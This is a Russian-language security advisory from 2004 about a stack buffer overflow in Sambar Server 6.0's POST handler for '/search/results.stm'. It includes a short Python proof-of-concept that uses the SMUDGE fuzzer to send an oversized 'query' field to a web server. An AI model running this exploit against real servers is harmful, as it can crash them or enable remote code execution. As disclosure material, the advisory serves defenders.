| Дата публикации: | 12.02.2004 |
| Всего просмотров: | 1283 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Sambar Server 6.0
Описание: Переполнение стекового буфера обнаружено в Sambar Server в обработке HTTP POST запросов. Удаленный пользователь может аварийно завершить работу Web сервера или выполнить произвольный код. Удаленный пользователь может послать специально сформированные данные через POST запрос '/search/results.stm', чтобы вызвать переполнение буфера и потенциально выполнить произвольный код на уязвимой системе. Пример/Эксплоит:
# http://felinemenace.org/~nd/SMUDGE
# Sambar script (c) nd@felinemenace.org
from SMUDGE import *
import sys
sm = SMUDGE(1)
sm.setname("SambarOverflow")
sm.plain("POST /search/results.stm HTTP/1.1")
sm.addcrlf()
sm.plain("Host: MSUDGEDPU")
sm.addcrlf()
sm.plain("Content-Length: ")
sm.blocksize("postdata")
sm.addcrlf()
sm.addcrlf()
sm.putblock("postdata")
sm.addcrlf()
sm.addcrlf()
sm.newblock("postdata")
sm.updateblock("postdata","spage=0&indexname=docs&query=")
sm.blockvariable("postdata","MEEP")
sm.updateblock("postdata","&style=page")
sm.run("127.0.0.1",80,"topdown","single")
URL производителя:http://www.sambar.com/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Sambar 6.0 stack overflow |